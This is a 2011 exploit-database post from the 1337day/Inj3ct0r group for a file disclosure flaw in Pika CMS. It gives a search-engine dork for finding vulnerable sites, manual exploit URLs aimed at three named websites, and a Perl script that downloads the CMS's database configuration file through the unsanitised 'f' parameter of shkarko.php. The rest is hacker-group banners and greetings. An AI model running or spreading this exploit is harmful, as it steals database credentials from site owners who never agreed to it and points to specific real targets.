Home / exploits Pika CMS baza_mysql.php File Disclosure
Posted on 01 June 2011
Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Live Contact : knockoutr@msn.com [~] E-Mail : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com [~] Reference : http://h4x0resec.blogspot.com [~] Special Thanks : Kalashinkov3 <= :) ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Pika CMS |~Price : N/A |~Version : N/A |~Software: http://www.pikacms.com/ |~Vulnerability Style : file disclosure |~Vulnerability Dir : / |~Google Keyword : "Powered by PikaCMS!" |[~]Date : "31.05.2011" ---------------------------------------------------------- shkarko.php <= 'f' Functions Not Security --------------------------------------------------------- Manual Exploitation http://www.fleteteverdha.info/shkarko.php?f=lidhjet/baza_mysql.php http://www.pikacms.com/shkarko.php?f=lidhjet/baza_mysql.php http://www.vetemlojra.com/shkarko.php?f=lidhjet/baza_mysql.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== Automatic Disclosure Exploit (PikaCms.PL) ================================================= use LWP::Simple; use LWP::UserAgent; system('cls'); system('title Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit'); system('color 2'); if(@ARGV < 2) { print "[-]Su Sekilde Kocum. "; &help; exit(); } sub help() { print "[+] usage1 : perl $0 HedefWeb /path/ "; print "[+] usage2 : perl $0 localhost / "; } print " ************************************************************************ "; print "* Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit * "; print "* Exploited By : KnocKout * "; print "* Contact : knockoutr[at]msn[dot]com * "; print "* -- * "; print "********************************************************************* "; ($TargetIP, $path, $File,) = @ARGV; $File="shkarko.php?f=lidhjet/baza_mysql.php"; my $url = "http://" . $TargetIP . $path . $File; print " Az Bekle Sikertiyorum!!! "; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "baza_mysql.php"); if ($request->is_success) { print "[+] $url <= Hedef Site Exploit Edildi! "; print "[+] OPERASYON TAMAM ! "; print "[+] baza_mysql.php Dosyasi Indirildi (z_WALKING_TIMES_DATA.php) "; print "[+] GRAYHATZ STAR "; print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... "; exit(); } else { print "[!] Exploit $url Basarisiz ! [!] ".$request->status_line." "; exit(); } ================================================================ .__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ \n| Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \n\_____ | __)_ / / / | \ \____ /_______ //_______ / \______ / / / / Was Here. # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
